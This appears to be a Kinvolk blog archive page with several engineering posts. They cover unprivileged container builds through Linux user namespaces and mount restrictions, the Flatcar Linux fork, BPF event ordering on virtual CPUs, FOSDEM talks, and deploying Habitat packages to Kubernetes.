Why should we avoid building software as root? First, to avoid potential collateral damage to the developer’s machine. Second, to avoid being compromised by potentially untrusted resources. This is especially important for build services where anyone can submit a build job: the administrators of the build service have to protect their services against potentially malicious build submissions.

Nowadays, more and more software in cloud infrastructure is built and distributed as container images. Whether it is a Docker image, an OCI bundle, ACI or another format, this is not so different from an archive file. And yet, the majority of container images are built via a Dockerfile with the Docker Engine, which runs as root for most of its operations.

This makes life difficult for build services that want to offer container builds to users that are not necessarily trusted. How did we dig ourselves into this hole?

Why does docker build need root?

There are two reasons why docker build needs root: some of the commands run during the build require root inside the image, and setting up the build container itself requires root.

Run commands with privileges

Dockerfiles allow executing arbitrary commands inside the container environment being built with the “RUN” command. This makes the build very convenient: users can use “apt” on Ubuntu-based images to install additional packages, and those packages will be installed not on the host but in the container being built. This alone requires root access in the container, because “apt” needs to install files in directories that are only writable by root.

Starting the build container

To be able to execute those “RUN” commands in the container, “docker build” needs to start this build container first. To start any container, Docker needs to perform the following privileged operations, among others:

  • Preparing an overlay filesystem. This is necessary to keep track of the changes compared to the base image and requires CAP_SYS_ADMIN to mount.
  • Creating new Linux namespaces (sometimes called “unsharing”): mount namespace, pid namespace, etc. All of them (except one, we will see below) require the CAP_SYS_ADMIN capability.
  • pivot_root or chroot, which also require CAP_SYS_ADMIN or CAP_SYS_CHROOT.
  • Mounting basic filesystems like /proc. The “RUN” command can execute arbitrary shell scripts, which often require a properly set up /proc.
  • Preparing basic device nodes like /dev/null, /dev/zero. This is also necessary for a lot of shell scripts. Depending on how they are prepared, this requires either CAP_MKNOD or CAP_SYS_ADMIN.

Only root can perform these operations:

Operation                        Capability required              Without root?
Mount a new overlayfs            CAP_SYS_ADMIN                    ❌
Create new (non-user) namespace  CAP_SYS_ADMIN                    ❌
Chroot or pivot_root             CAP_SYS_CHROOT or CAP_SYS_ADMIN  ❌
Mount a new procfs               CAP_SYS_ADMIN                    ❌
Prepare basic device nodes       CAP_MKNOD or CAP_SYS_ADMIN       ❌

This blog post will focus on some of those operations in detail. This is not an exhaustive list. For example, preparing basic device nodes is not covered in this blog post.

Projects similar to docker-build

There are other projects for building container images that aim to run unprivileged. Some of them support builds from a Dockerfile.

  • img: Standalone, daemon-less, unprivileged Dockerfile and OCI compatible container image builder.
  • buildah: A tool that facilitates building OCI images
  • kaniko
  • orca-build

They could be a building block for CI services or serverless frameworks which need to build a container image for each function.

Where user namespaces come into play

In the same way that other Linux namespaces restrict the visibility of resources to processes inside the namespace, processes in user namespaces only see a subset of all possible users and groups. In the initial user namespace, there are 2^32 (4294967296) possible uids. The range goes from 0, for the superuser or root, to 2^32 - 1.

uid mappings

When setting up a user namespace, container runtimes allocate a range of uids and specify a uid mapping. The mapping means that uid 0 (root) in the container could be mapped to, say, uid 100000 on the host. Because root is in this sense relative to a namespace, capabilities are also always relative to a specific user namespace. We will come back to that.
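To make the mapping concrete, here is a small Python sketch (an illustration only, not how the kernel implements it) that translates a uid seen inside a container to the corresponding host uid, using entries in the same format as /proc/&lt;pid&gt;/uid_map (inside-uid, outside-uid, length):

```python
def parse_uid_map(text):
    """Parse uid_map-style lines: <inside-uid> <outside-uid> <length>."""
    entries = []
    for line in text.strip().splitlines():
        inside, outside, length = (int(field) for field in line.split())
        entries.append((inside, outside, length))
    return entries

def to_host_uid(container_uid, uid_map):
    """Translate a uid seen inside the namespace to the host uid."""
    for inside, outside, length in uid_map:
        if inside <= container_uid < inside + length:
            return outside + (container_uid - inside)
    return None  # this uid is not mapped in the namespace

# uid 0 (root) in the container is uid 100000 on the host
uid_map = parse_uid_map("0 100000 65536")
print(to_host_uid(0, uid_map))
print(to_host_uid(1000, uid_map))
```

A uid outside the mapped range (here, anything at or above 65536 inside the container) has no host counterpart, which is why the function returns None.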

Nested user namespaces

User namespaces can be nested. The inner namespace has the same number of uids as the outer namespace or, usually, fewer. Not all uids from the outer namespace are mapped, but those that are are mapped in a bijective, one-to-one way.

Unprivileged user namespaces

As opposed to all other kinds of Linux namespaces, user namespaces can be created by an unprivileged user (without CAP_SYS_ADMIN). In this case, the uid mapping is restricted to a single uid. In the example below, uid 1000 on the host is mapped to root (uid 0) in the yellow container.

Once the new unprivileged user namespace is created, the process inside is root from the point of view of the container and therefore it has CAP_SYS_ADMIN, so it could create other kinds of namespaces.

This is a useful building block for our goal of unprivileged container builds.

Operation                        Capability required              Without root?
Mount a new overlayfs            CAP_SYS_ADMIN                    ❌
Create new user namespace        No capability required (*)       ✅
Create new (non-user) namespace  CAP_SYS_ADMIN                    ✅
Chroot or pivot_root             CAP_SYS_CHROOT or CAP_SYS_ADMIN  ❌
Mount a new procfs               CAP_SYS_ADMIN                    ❌
Prepare basic device nodes       CAP_MKNOD or CAP_SYS_ADMIN       ❌

(*): No capability is required as long as all of the following hold:

  • your kernel is built with CONFIG_USER_NS=y,
  • your Linux distribution does not add a distro-specific knob to restrict it (sysctl kernel.unprivileged_userns_clone on Arch Linux),
  • your uid mappings respect the restriction mentioned above,
  • seccomp is not blocking the unshare system call (as it could be in some Docker profiles).

Each Linux namespace is owned by a user namespace

Each Linux namespace instance, no matter what kind (mount, pid, etc.), has a user namespace owner. It is the user namespace where the process that created it sits. When several kinds of Linux namespaces are created in a single syscall, the newly created user namespace owns the other newly created namespaces.


The ownership of those namespaces is important because, for most operations, the kernel checks the owning user namespace when determining whether a process has the proper capability.

In the example below, a process attempts to perform a pivot_root() syscall. To succeed, it needs to have CAP_SYS_ADMIN in the user namespace that owns the mount namespace where the process is located. In other words, having CAP_SYS_ADMIN in an unprivileged user namespace does not allow you to “escape” the container and get more privileges outside.

This is done in the function may_mount():

ns_capable(current->nsproxy->mnt_ns->user_ns, CAP_SYS_ADMIN);

The function ns_capable() checks if the current process has the CAP_SYS_ADMIN capability within the user namespace that owns the mount namespace (mnt_ns) where the current process is located (current->nsproxy).

So by creating the new mount namespace inside the unprivileged user namespace, we can do more. Let’s check our progress and what we have achieved so far:

Operation                        Capability required              Without root?
Mount a new overlayfs            CAP_SYS_ADMIN                    ❌
Create new user namespace        No capability required (*)       ✅
Create new (non-user) namespace  CAP_SYS_ADMIN                    ✅
Chroot or pivot_root             CAP_SYS_CHROOT or CAP_SYS_ADMIN  ✅
Mount a new procfs               CAP_SYS_ADMIN                    ❌
Prepare basic device nodes       CAP_MKNOD or CAP_SYS_ADMIN       ❌

What about mounting the new overlayfs?

We’ve seen that pivot_root() can be done without privileges by creating a new mount namespace owned by a new unprivileged user namespace. Isn’t it the same for mounting the new overlayfs? After all, the mount() syscall is guarded by exactly the same call to ns_capable() that we saw above for pivot_root(). Unfortunately, that’s not enough.

New mounts vs bind mounts

The mount system call can perform distinct actions:

  • New mounts: this mounts a filesystem that was not mounted before. A block device might be provided if the filesystem type requires one (ext4, vfat). Some filesystems don’t need a block device (FUSE, NFS, sysfs). But in any case, the kernel maintains a struct super_block to keep track of options such as read-only.

  • Bind mounts: a filesystem can be mounted on several mountpoints. A bind mount adds a new mountpoint from an existing mount. This will not create a new superblock but reuse it. The aforementioned “read-only” option can be set at the superblock level but also at the mountpoint level. In the example below, /mnt/data is bind-mounted on /mnt/foo so they share the same superblock. It can be achieved with:

mount /dev/sdc /mnt/data		# new mount
mount --bind /mnt/data /mnt/foo	# bind mount
  • Change options on an existing mount. This can be superblock options, per-mountpoint options or propagation options (most useful when having several mount namespaces).

Each superblock has a user namespace owner. Each mount has a mount namespace owner. To create a new bind mount, having CAP_SYS_ADMIN in the user namespace that owns the mount namespace where the process is located is normally enough (we’ll see some exceptions later). But creating a new mount in a non-initial user namespace is only allowed in some filesystem types. You can find the list in the Linux git repository with:

$ git grep -nw FS_USERNS_MOUNT

It is allowed in procfs, tmpfs, sysfs, cgroupfs and a few others. It is disallowed in ext4, NFS, FUSE, overlayfs and, in fact, most filesystems.

So mounting a new overlayfs without privileges for container builds seems impossible, at least with upstream Linux kernels: Ubuntu kernels have for some time had the ability to do new mounts of overlayfs and FUSE in an unprivileged user namespace, by adding the FS_USERNS_MOUNT flag on those two filesystem types along with the necessary fixes.

Kinvolk worked with a client to contribute to the upstreaming effort of the FUSE-part of patches. Once everything is upstream, we will be able to mount overlayfs.

The FUSE mount will be upstreamed first, before the overlayfs. At that point, overlayfs could theoretically be re-implemented in userspace with a FUSE driver.

Operation                        Capability required              Without root?
Mount a new overlayfs            CAP_SYS_ADMIN                    ✅ (soon)
Create new user namespace        No capability required (*)       ✅
Create new (non-user) namespace  CAP_SYS_ADMIN                    ✅
Chroot or pivot_root             CAP_SYS_CHROOT or CAP_SYS_ADMIN  ✅
Mount a new procfs               CAP_SYS_ADMIN                    ❌
Prepare basic device nodes       CAP_MKNOD or CAP_SYS_ADMIN       ❌

What about procfs?

As noted above, procfs has the FS_USERNS_MOUNT flag so it is possible to mount it in an unprivileged user namespace. Unfortunately, there are other restrictions which block us in practice in Docker or Kubernetes environments.

What are locked mounts?

To explain locked mounts, we’ll first have a look at systemd’s sandboxing features. It has a feature to run services in a different mount namespace so that specific files and directories are read-only (ReadOnlyPaths=) or inaccessible (InaccessiblePaths=). The read-only part is implemented by bind-mounting the file or directory over itself and changing the mountpoint option to read-only. The inaccessible part is done by bind-mounting an empty file or an empty directory on the mountpoint, hiding what was there before.
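As an illustration, a hypothetical service unit using these sandboxing options might look like this (the binary and paths are made up for the example):

```ini
[Service]
ExecStart=/usr/bin/example-daemon
# /etc is bind-mounted over itself, with the mountpoint set read-only
ReadOnlyPaths=/etc
# the directory is hidden behind an empty mount
InaccessiblePaths=/var/lib/example-secrets
# drop CAP_SYS_ADMIN so the service cannot undo these mounts
CapabilityBoundingSet=~CAP_SYS_ADMIN
```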

Using bind mounts as a security measure to make files read-only or inaccessible is not unique to systemd: container runtimes do the same. This is only secure as long as the application cannot umount that bind mount or move it away to see what was hidden under it. Both umount and moving a mount away (MS_MOVE) can be done with CAP_SYS_ADMIN, so the systemd documentation suggests not giving that capability to a service if such sandboxing features are to be effective. Similarly, Docker and rkt don’t give CAP_SYS_ADMIN by default.

We can imagine another way to circumvent bind mounts to see what’s under the mountpoint: using unprivileged user namespaces. Applications don’t need privileges to create a new mount namespace inside a new unprivileged user namespace and then have CAP_SYS_ADMIN there. Once there, what’s preventing the application from removing the mountpoint with CAP_SYS_ADMIN? The answer is that the kernel detects such situations and marks mountpoints inside a mount namespace owned by an unprivileged user namespace as locked (flag MNT_LOCK) if they were created while cloning the mount namespace belonging to a more privileged user namespace. Those cannot be umounted or moved.

Let me describe what’s in this diagram:

  • On the left: the host mount namespace with a /home directory for Alice and Bob.

  • In the middle: a mount namespace for a systemd service that was started with the option “ProtectHome=yes”. /home is masked by a mount, hiding the alice and bob subdirectories.

  • On the right: a mount namespace created by the aforementioned systemd service, inside an unprivileged user namespace, attempting to umount /home in order to see what’s under it. But /home is a locked mount, so it cannot be unmounted there.

The exception of procfs and sysfs

The explanation about locked mounts is valid for all filesystems, including procfs and sysfs, but that’s not the full story. Indeed, in the build container we normally don’t do a bind mount of procfs but a new mount, because we are inside a new pid namespace and want a new procfs that reflects that.

New mounts are normally independent from each other, so a masked path in a mount would not prevent another new mount: if /home is mounted from /dev/sdb and has masked paths, it should not influence /var/www mounted from /dev/sdc in any way.

But procfs and sysfs are different: some files there are singletons: for example, the file /proc/kcore refers to the same kernel object, even if it is accessed from different mounts. Docker masks the following files in /proc:

$ sudo docker run -ti --rm busybox mount | grep /proc/
proc on /proc/asound type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/bus type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/fs type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/irq type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sys type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sysrq-trigger type proc (ro,nosuid,nodev,noexec,relatime)
tmpfs on /proc/kcore type tmpfs (rw,context="...",nosuid,mode=755)
tmpfs on /proc/latency_stats type tmpfs (rw,context="...",nosuid,mode=755)
tmpfs on /proc/timer_list type tmpfs (rw,context="...",nosuid,mode=755)
tmpfs on /proc/sched_debug type tmpfs (rw,context="...",nosuid,mode=755)
tmpfs on /proc/scsi type tmpfs (ro,seclabel,relatime)

The capability needed to circumvent the restriction on those files is normally CAP_SYS_ADMIN (for e.g. umount). To prevent a process without CAP_SYS_ADMIN from accessing those masked files by mounting a new procfs mount inside a new unprivileged user namespace and new mount namespace, the kernel uses the function mount_too_revealing() to check that procfs is already fully visible. If not, the new procfs mount is denied.

Protected by   Protection                 Applies to filesystem types
Bind mounts    Locked mounts (MNT_LOCK)   all
New mounts     mount_too_revealing()      procfs and sysfs

This is blocking us from mounting procfs from within a Kubernetes pod.

Several workarounds are possible:

  • Avoid mounting procfs in the build environment and update Dockerfiles that depend on it.
  • Use a privileged Kubernetes container, so that /proc in the Docker container is not covered. A “rawproc” option in Kubernetes is being discussed, with the underlying implementation in moby.
  • Change the kernel to allow a new procfs mount in an unprivileged user namespace, even when the parent proc mount is not fully visible, but with the same masks applied in the child proc mount. I started this discussion in an RFC patch, and there is an alternative proposal by Djalal Harouni to fix procfs more generally.


As you can see there are a lot of moving parts, as is the general case with Linux containers. But this is an area where development is quite active at the moment and hope for progress is greater than it has ever been. This blog post explored some aspects of the underlying mechanisms on Linux that are being worked on for unprivileged container builds: user namespaces, mounts, some filesystems. We hope to bring you updates about unprivileged container builds in the future and especially about our own involvement in these efforts.

Kinvolk’s offerings

Kinvolk is an engineering team based in Berlin working on Linux, Containers and Kubernetes. We combine our expertise of low-level Linux details like capabilities, user namespaces and the details of FUSE with our expertise of Kubernetes to offer specialised services for your infrastructure that goes all the way down the stack. Contact us at [email protected] to learn more about what Kinvolk does.

Announcing the Flatcar Linux project

Today Kinvolk announces Flatcar Linux, an immutable Linux distribution for containers. With this announcement, Kinvolk is opening the Flatcar Linux project to early testers. If you are interested in becoming a tester and willing to provide feedback, please let us know.

Flatcar Linux is a friendly fork of CoreOS’ Container Linux and as such, compatible with it. It is independently built, distributed and supported by the Kinvolk team.

Why fork Container Linux?

At Kinvolk, we provide support and engineering services for foundational open-source Linux projects used in cloud infrastructure. Last year we started getting inquiries about providing support for Container Linux. Since then, we have been thinking about how we could offer such support.

When we are asked to provide support for projects that we do not maintain–a common occurrence–the process is rather simple. We work with the upstream maintainers to evaluate whether a change would be acceptable and attempt to get that work into the upstream project. If that change is not acceptable to the upstream project and a client needs it, we can create a patch set that we maintain and provide our own release builds. Thus, it is straightforward to provide commercial support for upstream projects.

Providing commercial support for a Linux distribution is more difficult and can not be done without having full control over the means of building, signing and delivering the operating system images and updates. Thus, our conclusion was that forking the project would be required.

Why now?

With the announcement of Red Hat’s acquisition of CoreOS, many in the cloud native community quickly asked, “What is going to happen to Container Linux?” We were pleased when Rob announced Red Hat’s commitment to maintaining Container Linux as a community project. But these events bring up two issues that Flatcar Linux aims to address.

The strongest open source projects have multiple commercial vendors that collaborate in a mutually beneficial relationship. This increases the bus factor of a project. Container Linux has a bus factor of 1. The introduction of Flatcar Linux brings that to 2.

While we are hopeful that Red Hat is committed to maintaining Container Linux as an open source project, we feel that it is important that open source projects, especially those that are at the core of your system, have strong commercial support.

Road to general availability

Over the next month or so, we will be going through a testing phase. We will focus on responding to feedback that we receive from testers. We will also concentrate on improving processes and our build and delivery pipeline. Once the team is satisfied that the release images are working well and we are able to reliably deliver images and updates, we will make the project generally available. To receive notification when this happens, sign up for project updates.

How can I help?

We are looking for help testing builds and providing feedback. Let us know if you’d be able to test images here.

We are also looking for vendors that could donate caching, hosting and other infrastructure services to the project. You can contact us about this at [email protected].

More information

For more information, please see the project FAQ.

Follow Flatcar Linux and Kinvolk on Twitter to get updates about the Flatcar Linux project.

Kinvolk is now a Kubernetes Certified Service Provider

The Kinvolk team is proud to announce that we are now a Kubernetes Certified Service Provider. We join an esteemed group of organizations that provide valuable services to the Kubernetes community.

Kubernetes Certified Service Providers are vetted service companies that have at least 3 Certified Kubernetes Administrators on staff, have a track record of providing development and operation services to companies, and have that work used in production.

At Kinvolk, we have collaborated with leading companies in the cloud-native community to help build cloud infrastructure technologies that integrate optimally with Linux. Companies come to Kinvolk because of our unique mix of core Linux knowledge combined with well-documented experience in applying that knowledge to modern cloud infrastructure projects. We look forward to continuing such collaborations with more partners in the Kubernetes community.

To learn more about how our team can help you build or improve your products, or the open source projects you rely on, contact us at [email protected].

Follow us on Twitter to get updates on what Kinvolk is up to.

Timing issues when using BPF with virtual CPUs


After implementing the collecting of TCP connections using eBPF in Weave Scope (see our post on the Weaveworks blog) we faced an interesting bug that happened only in virtualized environments like AWS, but not on bare metal. The events retrieved via eBPF seemed to be received in the wrong chronological order. We are going to use this bug as an opportunity to discuss some interesting aspects of BPF and virtual CPUs (vCPUs).


Let’s describe in more detail the scenario and provide some background on Linux clocks.

Why is chronological order important for Scope?

Scope provides a visualization of network connections in distributed systems. To do this, Scope needs to maintain a list of current TCP connections. It does so by receiving TCP events from the kernel via the eBPF program we wrote, tcptracer-bpf. Scope can receive either TCP connect, accept, or close events and update its internal state accordingly.

If events were to be received in the wrong order–a TCP close before a TCP connect–Scope would not be able to make sense of the events; the first TCP close would not match any existing connection that Scope knows of, and the second TCP connect would add a connection in the Scope internal state that will never be removed.
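A minimal sketch of such state tracking (hypothetical, not Scope’s actual code) shows why order matters: a close that arrives before its connect matches nothing, and the later connect leaks an entry that is never removed:

```python
def apply_events(events):
    """Track open TCP connections from (event_type, connection_id) pairs."""
    connections = set()
    unmatched_closes = 0
    for kind, conn in events:
        if kind in ("connect", "accept"):
            connections.add(conn)
        elif kind == "close":
            if conn in connections:
                connections.remove(conn)
            else:
                unmatched_closes += 1  # close with no known connection
    return connections, unmatched_closes

# In order: the connection is opened, then removed again.
print(apply_events([("connect", "a"), ("close", "a")]))
# Out of order: the close matches nothing and "a" is never removed.
print(apply_events([("close", "a"), ("connect", "a")]))
```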

TCP events sent from kernel space to userspace

How are events transferred from the kernel to the Scope process?

Context switches and kernel/userspace transitions can be slow and we need an efficient way to transfer a large number of events. This is achieved using a perf ring buffer. A ring buffer or a circular buffer is a data structure that allows a writer to send events to a reader asynchronously. The perf subsystem in the Linux kernel has a ring buffer implementation that allows a writer in the kernel to send events to a reader in userspace. It is done without any expensive locking mechanism by using well-placed memory barriers.

On the kernel side, the BPF program writes an event in the ring buffer with the BPF helper function bpf_perf_event_output(), introduced in Linux 4.4. On the userspace side, we can read the events either from an mmaped memory region (fast), or from a bpf map file descriptor with the read() system call (slower). Scope uses the fast method.

However, as soon as the computer has more than one CPU, several TCP events could happen simultaneously, one per CPU for example. This means there could be several writers at the same time, so we cannot use a single ring buffer for everything. The solution is simple: use a different ring buffer for each CPU. On the kernel side, each CPU writes into its own ring buffer, and the userspace process reads sequentially from all ring buffers.
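As an illustration of the data structure, here is a simplified single-writer, single-reader ring buffer in Python (a toy sketch; the real perf implementation works on shared memory with carefully placed memory barriers):

```python
class RingBuffer:
    """Fixed-size circular buffer with one writer and one reader."""

    def __init__(self, size):
        self.slots = [None] * size
        self.head = 0  # next slot the writer fills
        self.tail = 0  # next slot the reader drains

    def write(self, event):
        if self.head - self.tail == len(self.slots):
            return False  # buffer full: the writer must drop the event
        self.slots[self.head % len(self.slots)] = event
        self.head += 1
        return True

    def read(self):
        if self.tail == self.head:
            return None  # buffer empty
        event = self.slots[self.tail % len(self.slots)]
        self.tail += 1
        return event

# One ring buffer per CPU: each CPU writes only to its own buffer,
# and the userspace reader drains them all.
per_cpu = {0: RingBuffer(8), 1: RingBuffer(8)}
per_cpu[0].write("connect")
per_cpu[1].write("close")
print([rb.read() for rb in per_cpu.values()])
```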

TCP events traveling through ring buffers.

Multiple ring buffers introduce out-of-order events

Each ring buffer is normally ordered chronologically as expected because each CPU writes the events sequentially into the ring buffer. But on a busy system, there could be several events pending in each ring buffer. When the user-space process picks the events, at first it does not know whether the event from ring buffer cpu#0 happened before or after the event from ring buffer cpu#1.

Adding timestamps for sorting events

Fortunately, BPF has a simple way to address this: a bpf helper function called bpf_ktime_get_ns() introduced in Linux 4.1 gives us a timestamp in nanoseconds. The TCP event written on the ring buffer is a struct. We simply added a field in the struct with a timestamp. When the userspace program receives events from different ring buffers, we sort the events according to the timestamp.

The BPF program (in yellow) executed by a CPU calls two BPF helper functions: bpf_ktime_get_ns() and bpf_perf_event_output()

Sorting and synchronization

Sorting is actually not that simple because we don’t just have a static set of events to sort. Instead, we have a dynamic system where several sources continuously give the process new events. As a result, while sorting the events received at some point in time, we could receive a new event that has to be placed before the events we are currently sorting. It is like sorting a set without knowing the complete set of items to sort.

To solve this problem, Scope needs a means of synchronization. Before we start gathering events and sorting, we measure the time with clock_gettime(). Then, we read events from all the ring buffers but stop processing a ring buffer if it is empty or if it gives us an event with a timestamp after the time of clock_gettime(). It is done in this way so as to only sort the events that are emitted before the beginning of the collection. New events will only be sorted in the next iteration.
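The collection step can be sketched like this (a hypothetical simplification of Scope’s logic): take a cutoff timestamp first, then drain each per-CPU queue only up to that cutoff, and sort what was collected; anything newer waits for the next iteration:

```python
def collect_sorted(queues, cutoff):
    """Drain events with timestamp <= cutoff from each per-CPU queue,
    then sort the batch; later events wait for the next iteration."""
    batch = []
    for queue in queues:
        while queue and queue[0][0] <= cutoff:
            batch.append(queue.pop(0))
    return sorted(batch)  # events are (timestamp, type) pairs

cpu0 = [(10, "connect"), (40, "close"), (90, "connect")]
cpu1 = [(25, "accept")]
print(collect_sorted([cpu0, cpu1], cutoff=50))
print(cpu0)  # the event at t=90 stays queued for the next round
```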

A word on different clocks

Linux has several clocks as you can see in the clock_gettime() man page. We need to use a monotonic clock, otherwise the timestamp from different events cannot be compared meaningfully. Non-monotonicity can come from clock updates from NTP, updates from other software (Google clock skew daemon), timezones, leap seconds, and other phenomena.

But also importantly, we need to use the same clock in the events (measured with the BPF helper function bpf_ktime_get_ns) and the userspace process (with system call clock_gettime), since we compare the two clocks. Fortunately, the BPF helper function gives us the equivalent of CLOCK_MONOTONIC.
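In Python on Linux, the same monotonic clock is available through clock_gettime(); a quick illustrative check that successive readings can safely be compared because they never go backwards:

```python
import time

# CLOCK_MONOTONIC readings are comparable: a later read is never smaller.
samples = [time.clock_gettime_ns(time.CLOCK_MONOTONIC) for _ in range(1000)]
assert all(a <= b for a, b in zip(samples, samples[1:]))

# Wall-clock time (CLOCK_REALTIME) offers no such guarantee: NTP or an
# administrator can step it backwards, so it must not be used to order events.
print("monotonic readings are non-decreasing")
```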

Bugs in the Linux kernel can make the timestamp wrong. For example, a bug was introduced in 4.8 and was backported to older kernels by distros. The fix was included in 4.9 and also backported. In Ubuntu, for example, the bug was introduced in kernel 4.4.0-42 and was not fixed until kernel 4.4.0-51.

The problem with vCPUs

The above scenario requires strictly reliable timing. But vCPUs don’t make this straightforward.

Events are still unordered sometimes

Despite implementing all of this, we still sometimes noticed that events were ordered incorrectly. It happened rarely–once every few days or so–and only on EC2 instances, not on bare metal. What explains the difference in behaviour between virtualized environments and bare metal?

To understand the difference, we’ll need to take a closer look at the source code. Scope uses the library tcptracer-bpf to load the BPF programs. The BPF programs are actually quite complex because they need to handle different cases: IPv4 vs IPv6, the asynchronous nature of TCP connect, and the difficulty of passing contexts between BPF functions. But for the purpose of this race, we can simplify them to two function calls:

  • bpf_ktime_get_ns() to measure the time
  • bpf_perf_event_output() to write the event–including the timestamp–to the ring buffer

The way it was written, we assumed that the time between those two functions was negligible or at least constant. But in virtualized environments, virtual CPUs (vCPU) can randomly sleep, even inside BPF execution in kernel, depending on the hypervisor scheduling. So the time a BPF program takes to complete can vary from one execution to another.

Consider the following diagram:

Two CPUs executing the same BPF function concurrently

With a vCPU, we have no guarantees with respect to how long a BPF program will take between the two function calls–we’ve seen up to 98ms. It means that the userspace program does not have a guarantee that it will receive all the events before a specific timestamp.
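The race can be simulated without BPF (a toy model with hand-picked numbers): each event carries the timestamp taken when the BPF program started, but only becomes visible to the reader once the write to the ring buffer completes, and a vCPU pause stretches that window:

```python
def reader_sees(events, read_time):
    """Return timestamps visible to a reader at read_time, sorted.
    Each event is (timestamp, visible_at): the time bpf_ktime_get_ns()
    ran, and the time bpf_perf_event_output() finished."""
    return sorted(ts for ts, visible_at in events if visible_at <= read_time)

# cpu0's vCPU was descheduled for ~98 time units between the two calls.
events = [
    (1, 99),   # cpu0: timestamped at t=1, but written only at t=99
    (50, 51),  # cpu1: timestamped at t=50, written at t=51
]
print(reader_sees(events, read_time=60))   # only cpu1's event is visible
print(reader_sees(events, read_time=100))  # cpu0's older event shows up late
```

A reader collecting everything up to t=60 concludes it has all events before that time, yet an event timestamped t=1 is still in flight; this is exactly the broken guarantee described above.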

In effect, this means we can not rely on absolute timing consistency on virtualization environments. This, unfortunately, means implementers must take such a scenario into consideration.

Possible fixes

Any solution would have to ensure that the user-space Scope process waits long enough to have received the events from the different queues up to a specific time. One suggested solution was to regularly generate synchronization events on each CPU and deliver them along the same path in the ring buffers. This would ensure that no CPU sleeps for a long time without handling events.

But due to the difficulty of implementation and the rarity of the issue, we implemented a workaround by just detecting when the problem happens and restarting the BPF engine in tcptracer-bpf.


Investigating this bug and writing workaround patches for it made us write a reproducer using CPU affinity primitives (taskset) and explore several complex aspects of Linux systems: virtual CPUs in hypervisors, clocks, ring buffers, and of course eBPF.

We’d be interested to hear from others who have encountered such issues with vCPUs and especially those who have additional insight or other ideas for proper fixes.

Kinvolk is available for hire for Linux and Kubernetes based projects

Follow us on Twitter to get updates on what Kinvolk is up to.

Join the Kinvolk team at FOSDEM 2018!

FOSDEM, the premier European open source event that takes place in Brussels, is right around the corner! Most of the Kinvolk team is heading there for a collaborative weekend, with three of our engineers giving talks.

Kinvolk Talk Schedule

Sunday, February 4, 2018

  • 10:00 - 10:25: **Zeeshan Ali, “Rust memory management"**
    Zeeshan, software engineer at Kinvolk, will give a quick introduction to the memory management concepts of Rust, a systems programming language that focuses on safety and performance simultaneously.

  • 11:30 - 11:50: **Iago López Galeiras, “State of the rkt container runtime and its Kubernetes integration"**
    Iago, technical lead & co-founder at Kinvolk, will be diving into rkt container runtime and its Kubernetes integration, specifically looking at the progress of rkt and rktlet and the Kubernetes CRI implementation of rkt.

  • 15:05 - 15:25: **Alban Crequy, “Exploring container image distribution with casync"**
    Alban, CTO and co-founder at Kinvolk, will explore container image distribution with casync, a content-addressable data synchronization tool.

We’re looking forward to seeing old friends and making new ones.

Follow us on Twitter to see what we are up to at the conference!

Automated Build to Kubernetes with Habitat Builder


Imagine a set of tools which allows you to not only build your codebase automatically each time you apply new changes but also to deploy to a cluster for testing, provided the build is successful. Once the smoke tests pass or the QA team gives the go ahead, the same artifact can be automatically deployed to production.

In this blog post we talk about such an experimental pipeline that we’ve built using Habitat Builder and Kubernetes. But first, let’s look at the building blocks.

What is Habitat and Habitat Builder?

Habitat is a tool by Chef that allows one to automate the deployment of applications. It allows developers to package their application for multiple environments like a container runtime or a VM.

One of Habitat’s components is Builder. It uses a file that is part of the application codebase to build a Habitat package. This file is to Habitat what a Dockerfile is to Docker and, like Docker, the build outputs an artifact, which for Habitat has a .hart extension.

Habitat also has a concept called channels which are similar to tags. By default, a successful build is tagged under the unstable channel and users can use the concept of promotion to promote a specific build of a package to a different channel like stable, staging or production. Users can choose channel names for themselves and use the hab pkg promote command to promote a package to a specific channel.

Please check out the tutorials on the Habitat site for a more in-depth introduction to Habitat.

Habitat ❤ Kubernetes

Kubernetes is a platform that runs containerized applications and supports container scheduling, orchestration, and service discovery. Thus, while Kubernetes does the infrastructure management, Habitat manages the application packaging and deployment.

We will take a look at the available tools that help us integrate Habitat in a functioning Kubernetes cluster.

Habitat Operator

A Kubernetes Operator is an abstraction that takes care of running a more complex piece of software. It leverages the Kubernetes API, and manages and configures the application by hiding the complexities away from the end user. This allows a user to be able to focus on using the application for their purposes instead of dealing with deployment and configuration themselves. The Kinvolk team built a Habitat Operator with exactly these goals in mind.

Habitat Kubernetes Exporter

Recently, a new exporter was added to Habitat by the Kinvolk team that helps in integrating Habitat with Kubernetes. It creates and uploads a Docker image to a Docker registry, and returns a manifest that can be applied with kubectl. The output manifest file can be specified as a command line argument and it also accepts a custom Docker registry URL. This blog post covers this topic in more depth along with a demo at the end.

Automating Kubernetes Export

Today we are excited to show you a demo of a fully automated Habitat Builder to Kubernetes pipeline that we are currently working on together with the Habitat folks:

The video shows a private Habitat Builder instance re-building the it-works project, exporting a Docker image to Docker Hub and automatically deploying it to a local Kubernetes cluster through the Habitat Operator. Last but not least, the service is promoted from unstable to testing automatically.

In the future, Kubernetes integration will allow you to set up not only seamless, automated deploys but also bring Habitat’s service promotion to services running in Kubernetes. Stay tuned!

If you want to follow our work (or set up the prototype yourself), you can find a detailed README here.


This is an exciting start to how both Habitat and Kubernetes can complement each other. If you are at KubeCon, stop by at the Habitat or Kinvolk booth to chat about Habitat and Kubernetes. You can also find us on the Habitat slack in the #general or #kubernetes channels.

Get started with Habitat on Kubernetes

Habitat is a project that aims to solve the problem of building, deploying and managing services. We at Kinvolk have been working on Kubernetes integration for Habitat in cooperation with Chef. This integration comes in the form of a Kubernetes controller called Habitat operator. The Habitat operator allows cluster administrators to fully utilize Habitat features inside their Kubernetes clusters, all the while maintaining high compatibility with the “Kubernetes way” of doing things. For more details about Habitat and the Habitat operator have a look at our introductory blog post.

In this guide we will explain how to use the Habitat operator to run and manage a Habitat-packaged application in a Kubernetes cluster on Google Kubernetes Engine (GKE). This guide assumes a basic understanding of Kubernetes.

We will deploy a simple web application which displays the number of times the page has been accessed.


We’re going to assume some initial setup is done. For example, you’ll need to have created an account on Google Cloud Platform and have already installed and configured the Google Cloud SDK as well as its beta component. Lastly, you’ll want to download kubectl so you can connect to the cluster.

Creating a cluster

To start, we’ll want to create a project on GCP to contain the cluster and all related settings. Project names are unique on GCP, so use one of your choosing in the following commands.

